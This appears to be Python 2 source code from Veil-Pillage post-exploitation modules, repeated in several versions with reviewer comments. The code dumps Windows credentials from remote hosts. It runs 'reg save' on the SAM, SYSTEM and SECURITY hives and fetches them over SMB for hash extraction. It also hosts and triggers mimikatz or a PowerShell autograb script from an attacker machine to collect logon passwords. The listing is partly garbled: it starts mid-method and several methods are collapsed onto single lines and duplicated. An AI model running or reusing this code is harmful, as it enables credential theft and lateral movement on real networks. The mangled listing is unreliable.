time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += ( "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) if len(allhashes) > 0: allhashes = sorted(set(allhashes)) self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n" if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
# Hash dump via `reg save` of HKLM\SYSTEM, HKLM\SECURITY and HKLM\SAM to
# C:\Windows\Temp on each target; after a fixed 5 s sleep the hives are fetched
# over SMB (delete=False), written to the local files /tmp/system,
# /tmp/security and /tmp/sam, and parsed with
# creddump.dump_file_hashes(system, sam). Per-target output is stored as
# hashes.txt; at the end all hashes are lower-cased, de-duplicated and sorted.
# NOTE(review): an empty SECURITY hive does not set `error` — harmless here
# because only the system and sam paths are passed to creddump, but the
# asymmetry is worth a comment. The failure message lacks a space before "on"
# (the "'on " + target literal). The local /tmp paths are fixed and shared
# between targets and runs; tempfile.mkdtemp() would isolate them.
# NOTE(review): the saved hives remain on the target under C:\Windows\Temp
# (delete=False) and the plaintext password is concatenated into self.output.
# NOTE(review): this listing splits the method across two physical lines,
# inside a string literal, and inline '#' comments swallow the rest of each
# line — it must be re-indented before use.
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # let's keep track of ALL hashes found allHashes = "" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" for target in self.targets: print helpers.color("\n [*] Dumping hashes on " + target) # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) error = False if systemFile == "": self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open('/tmp/system', 'w') f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open('/tmp/security', 'w') f.write(securityFile) f.close() if samFile == "": self.output += "[!] 
File '" + samFile + "' from " + target + " empty or doesn't exist\n" error = True else: f = open('/tmp/sam', 'w') f.write(samFile) f.close() if not error: # get all the hashes from these hives hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # add the hashes to our global list allHashes += hashes # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes) self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" else: self.output += "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n" if allHashes != "": # get all non-empty hashes, uniquify and sort them allHashes = [p.lower() for p in allHashes.split("\n") if p != ''] allHashes = sorted(set(allHashes)) self.output += "[*] All unique hashes:\n" + "\n".join( allHashes) + "\n"
# Runs the architecture-matched mimikatz<arch>.exe (x64 when
# %PROCESSOR_ARCHITECTURE% contains "64", else x86) on each target via
# delivery_methods.hostTrigger with "sekurlsa::logonPasswords full" redirected
# to out_file, waits `delay` seconds, retrieves and deletes out_file, parses it
# with helpers.parseMimikatz and stores it as mimikatz.txt. Aggregated
# msv1_0/kerberos/wdigest/tspkg lists are de-duplicated and appended at the end.
# NOTE(review): a target whose architecture probe returns text containing
# "error" is skipped, but a non-numeric "delay" option is only caught by
# int(delay) after the trigger has already fired — validate it up front.
# The plaintext password is concatenated into self.output on both branches.
# NOTE(review): this listing splits the method across two physical lines and
# inline '#' comments swallow the rest of each line — re-indent before use.
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file mimikatz will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # let's keep track of ALL plaintext credentials found allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [] for target in self.targets: print "\n [*] Executing mimikatz on " + target # first, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod) # if there's a failure in this initial execution, go to the next target if "error" in archResult: self.output += "[!] Mimikatz failed for " + target + " : " + archResult + "\n" continue arch = "x86" if "64" in archResult: arch = "x64" exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file # now time for mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." 
time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) if out != "": self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" # append the total mimikatz creds if we have any if len(allmsv) > 0: allmsv = sorted(set(allmsv)) self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n" if len(allkerberos) > 0: allkerberos = sorted(set(allkerberos)) self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n" if len(allwdigest) > 0: allwdigest = sorted(set(allwdigest)) self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n" if len(alltspkg) > 0: alltspkg = sorted(set(alltspkg)) self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
    """Dump local account hashes from every target via ``reg save`` of the hives.

    Per target: run a single ``reg save`` command line for HKLM\\SYSTEM,
    HKLM\\SECURITY and HKLM\\SAM into C:\\Windows\\Temp, wait 5 seconds, fetch
    the three hive copies over SMB, write them to /tmp/system, /tmp/security
    and /tmp/sam, and run creddump.dump_file_hashes on the system and sam
    copies. Hashes are saved per target with helpers.saveModuleFile and a
    de-duplicated, lower-cased summary is appended to ``self.output``.

    Inputs read from ``self``: ``self.creds[0]``, ``self.targets`` and the
    ``required_options`` key trigger_method. Nothing is returned.

    NOTE(review): the hive copies are fetched with ``delete=False`` and never
    removed from the target, and the local /tmp copies use fixed paths, are
    created with the process's default permissions and are never removed
    either. Both are persistent artifacts containing secret material; the
    fixed /tmp paths also mean concurrent runs would overwrite each other.
    ``self.output`` embeds the plaintext ``password`` used for the module.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    # let's keep track of ALL hashes found; accumulated as one newline-separated
    # string and only split into a list at the end
    allHashes = ""
    # reg.exe command to save off the hives (three saves chained with &&)
    regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
    for target in self.targets:
        print helpers.color("\n [*] Dumping hashes on " + target)
        # execute the registry save command; its result is not checked,
        # failure is only detected by the empty-file tests below
        command_methods.executeCommand(target, username, password, regSaveCommand, triggerMethod)
        # sleep for 5 seconds to let everything backup (fixed, not tied to completion)
        time.sleep(5)
        # grab all of the backed up files; delete=False leaves them on the target
        systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
        securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
        samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
        # error is set only for the two hives dump_file_hashes actually needs
        error = False
        if systemFile == "":
            # NOTE(review): systemFile is "" in this branch, so the message
            # reads "File '' from ..."; the remote path would be more useful
            self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
            error = True
        else:
            f = open("/tmp/system", "w")
            f.write(systemFile)
            f.close()
        # a missing SECURITY hive is reported but does not set error, since it
        # is not passed to dump_file_hashes below
        if securityFile == "":
            self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
        else:
            f = open("/tmp/security", "w")
            f.write(securityFile)
            f.close()
        if samFile == "":
            self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
            error = True
        else:
            f = open("/tmp/sam", "w")
            f.write(samFile)
            f.close()
        if not error:
            # get all the hashes from these hives (the local copies just written)
            hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
            # add the hashes to our global list
            allHashes += hashes
            # save off the file to PILLAGE_OUTPUT_PATH/hashdump/target/hashes.txt
            saveLocation = helpers.saveModuleFile(self, target, "hashes.txt", hashes)
            self.output += (
                "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
            )
        else:
            self.output += (
                "[!] Error executing hashdump using creds '" + username + ":" + password + "'on " + target + "\n"
            )
    if allHashes != "":
        # get all non-empty hashes, uniquify and sort them
        allHashes = [p.lower() for p in allHashes.split("\n") if p != ""]
        allHashes = sorted(set(allHashes))
        self.output += "[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"
def run(self):
    """Collect hashes and logon credentials from every target, choosing a method per host.

    For each target the grab method is chosen from ``force_method``
    ("binary" or "powershell"); any other value probes the host by running
    ``powershell.exe -c "$a=42;$a"`` and checking for "42". With PowerShell the
    hosted autograb.ps1 is triggered via delivery_methods.powershellHostTrigger
    and its output file is fetched, parsed (parseMimikatz + parseHashdump) and
    saved. Without it, the SAM/SYSTEM/SECURITY hives are exported with
    ``reg save``, fetched, parsed with creddump, and then the architecture-matched
    mimikatz binary is hosted and triggered via delivery_methods.hostTrigger.
    All trigger methods in this module are hard-coded ("wmis"/"winexe").
    Aggregated, de-duplicated results are appended to ``self.output``;
    nothing is returned.

    Inputs read from ``self``: ``self.creds[0]``, ``self.targets`` and the
    ``required_options`` keys lhost, use_ssl, force_method, delay, out_file.

    NOTE(review): in the reg.exe branch the hive copies are left on the target
    (``delete=False``) and the local /tmp copies are fixed paths that are never
    removed; creddump is also run even when a fetch returned "", so a stale
    /tmp file from a previous target could be parsed and attributed to this one.
    ``self.output`` embeds the plaintext ``password`` used for the module.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    lhost = self.required_options["lhost"][0]
    use_ssl = self.required_options["use_ssl"][0]
    force_method = self.required_options["force_method"][0]
    # delay stays a string for the status messages; int() is applied at the sleeps
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]
    # let's keep track of all credentials found across every target
    allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
    for target in self.targets:
        powershellInstalled = False
        # check if we're forcing a particular grab method
        if force_method.lower() == "binary":
            powershellInstalled = False
        elif force_method.lower() == "powershell":
            powershellInstalled = True
        else:
            # check if we have a functional Powershell installation by
            # evaluating a trivial expression and comparing the echoed result
            powershellCommand = "powershell.exe -c \"$a=42;$a\""
            powershellResult = command_methods.executeResult( target, username, password, powershellCommand, "wmis")
            if powershellResult.strip() == "42":
                powershellInstalled = True
        if powershellInstalled:
            # do powersploit combined file of invoke-mimikatz and powerdump
            print helpers.color("\n [*] Powershell installed on " + target)
            self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
            # the temporary output file we will write to. This mutates the
            # loop-outer out_file; once prefixed it contains a backslash, so
            # later targets reuse the same absolute path.
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file
            # path to the combined Invoke-Mimikatz/powerdump powershell script
            secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
            # trigger the powershell download on just this target; return value unchecked
            delivery_methods.powershellHostTrigger(target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True)
            print "\n [*] Waiting " + delay + "s for Autograb to run..."
            time.sleep(int(delay))
            # grab the output file and delete it (delete=True removes it from the target)
            out = smb.getFile(target, username, password, out_file, delete=True)
            # save the file off to the appropriate location (written even when out is "")
            saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)
            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            # parse the powerdump component of the same output file
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)
            # an empty string from getFile is the only failure signal available here
            if out != "":
                self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
        else:
            # do reg.exe for hashdump and host/execute for mimikatz
            print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
            print helpers.color( "\n [*] Using reg.exe save method for hash dumping on " + target)
            self.output += "[!] Powershell not installed on " + target + "\n"
            # reg.exe command to save off the hives (three saves chained with &&)
            regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
            # execute the registry save command; its result is not checked
            command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
            print helpers.color("\n [*] Dumping hashes on " + target)
            # sleep for 5 seconds to let everything backup (fixed, not tied to completion)
            time.sleep(5)
            # grab all of the backed up files; delete=False leaves them on the target
            systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
            securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
            samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
            # more error-checking here? Unlike the standalone hashdump module
            # there is no error flag: an empty fetch is logged but execution
            # still continues to dump_file_hashes below.
            if systemFile == "":
                # NOTE(review): systemFile is "" here, so the message reads "File '' ..."
                self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/system', 'w')
                f.write(systemFile)
                f.close()
            if securityFile == "":
                self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/security', 'w')
                f.write(securityFile)
                f.close()
            if samFile == "":
                self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
            else:
                f = open('/tmp/sam', 'w')
                f.write(samFile)
                f.close()
            # get all the hashes from these hives (the local copies, whatever their state)
            out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
            # save the output file off
            saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
            self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
            # save these off to the universal list
            hashes = helpers.parseHashdump(out)
            allhashes.extend(hashes)
            # now, detect the architecture. NOTE(review): unlike the standalone
            # mimikatz module there is no "error" check on archResult here.
            archCommand = "echo %PROCESSOR_ARCHITECTURE%"
            archResult = command_methods.executeResult( target, username, password, archCommand, "wmis")
            arch = "x86"
            if "64" in archResult:
                arch = "x64"
            # now time for ze mimikatz!
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
            # the temporary output file we will write to (same prefixing as the
            # PowerShell branch; mutates the loop-outer out_file)
            if "\\" not in out_file:
                # otherwise assume it's an absolute path
                out_file = "C:\\Windows\\Temp\\" + out_file
            # arguments passed to the hosted binary; stdout is redirected to out_file
            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
            # host mimikatz.exe and trigger it ONLY on this particular machine
            # so we can get the architecture correct; return value unchecked
            delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs)
            print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
            time.sleep(int(delay))
            # grab the output file and delete it (delete=True removes it from the target)
            out = smb.getFile(target, username, password, out_file, delete=True)
            # parse the mimikatz output and append it to our globals
            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            # save the file off to the appropriate location (written even when out is "")
            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
            if out != "":
                self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
    # summaries: each list is de-duplicated and sorted before being joined
    if len(allhashes) > 0:
        allhashes = sorted(set(allhashes))
        self.output += "[*] All unique hashes:\n\t" + "\n\t".join( allhashes) + "\n"
    if len(allmsv) > 0:
        allmsv = sorted(set(allmsv))
        self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
    if len(allkerberos) > 0:
        allkerberos = sorted(set(allkerberos))
        self.output += "[*] All kerberos:\n\t" + "\n\t".join( allkerberos) + "\n"
    if len(allwdigest) > 0:
        allwdigest = sorted(set(allwdigest))
        self.output += "[*] All wdigest:\n\t" + "\n\t".join( allwdigest) + "\n"
    if len(alltspkg) > 0:
        alltspkg = sorted(set(alltspkg))
        self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
    """Run mimikatz on every target and aggregate the parsed logon credentials.

    Per target: detect the architecture with an echo of %PROCESSOR_ARCHITECTURE%,
    host the matching mimikatz{arch}.exe via delivery_methods.hostTrigger with
    its output redirected to ``out_file``, wait ``delay`` seconds, fetch and
    delete ``out_file`` over SMB, parse it and save it with helpers.saveModuleFile.
    Results are appended to ``self.output``; nothing is returned.

    Inputs read from ``self``: ``self.creds[0]``, ``self.targets`` and the
    ``required_options`` keys trigger_method, lhost, delay, out_file.

    NOTE(review): ``self.output`` lines embed the plaintext ``password`` used
    for the module, so whatever stores or displays the output also stores the
    credential. ``int(delay)`` raises ValueError if the option is not numeric.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    lhost = self.required_options["lhost"][0]
    # delay is kept as a string for the status message and converted with int()
    # only at the sleep below
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]
    # the temporary output file mimikatz's output is redirected to on the target
    if "\\" not in out_file:
        # otherwise assume it's an absolute path
        out_file = "C:\\Windows\\Temp\\" + out_file
    # let's keep track of ALL plaintext credentials found across every target
    allmsv, allkerberos, allwdigest, alltspkg = [], [], [], []
    for target in self.targets:
        print "\n [*] Executing mimikatz on "+target
        # first, detect the architecture
        archCommand = "echo %PROCESSOR_ARCHITECTURE%"
        archResult = command_methods.executeResult(target, username, password, archCommand, triggerMethod)
        # if there's a failure in this initial execution, go to the next target.
        # NOTE(review): this is a substring test on the command output —
        # presumably executeResult returns a string containing "error" on
        # failure; any legitimate output containing that word is also skipped.
        if "error" in archResult:
            self.output += "[!] Mimikatz failed for "+target+" : "+archResult+"\n"
            continue
        # anything other than a "64" in the architecture string is treated as x86
        arch = "x86"
        if "64" in archResult:
            arch = "x64"
        # arguments passed to the hosted binary; stdout is redirected to out_file
        exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
        # now time for mimikatz!
        mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz"+arch+".exe"
        # host the arch-correct mimikatz.exe and trigger it with the appropriate arguments.
        # NOTE(review): hostTrigger's return value is not checked here, so a
        # failed trigger is only noticed later as an empty result file.
        delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)
        print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
        time.sleep(int(delay))
        # grab the output file and delete it (delete=True removes it from the target)
        out = smb.getFile(target, username, password, out_file, delete=True)
        # parse the mimikatz output and append it to our globals;
        # parseMimikatz returns one list per credential provider
        (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
        allmsv.extend(msv1_0)
        allkerberos.extend(kerberos)
        allwdigest.extend(wdigest)
        alltspkg.extend(tspkg)
        # save the file off to the appropriate location.
        # NOTE(review): this is done even when out is empty, so an empty
        # mimikatz.txt is written for failed targets.
        saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
        # an empty string from getFile is the only failure signal available here
        if out != "":
            self.output += "[*] Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
        else:
            self.output += "[!] Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
    # append the total mimikatz creds if we have any; each list is de-duplicated
    # and sorted before being joined into the summary
    if len(allmsv) > 0:
        allmsv = sorted(set(allmsv))
        self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
    if len(allkerberos) > 0:
        allkerberos = sorted(set(allkerberos))
        self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
    if len(allwdigest) > 0:
        allwdigest = sorted(set(allwdigest))
        self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
    if len(alltspkg) > 0:
        alltspkg = sorted(set(alltspkg))
        self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"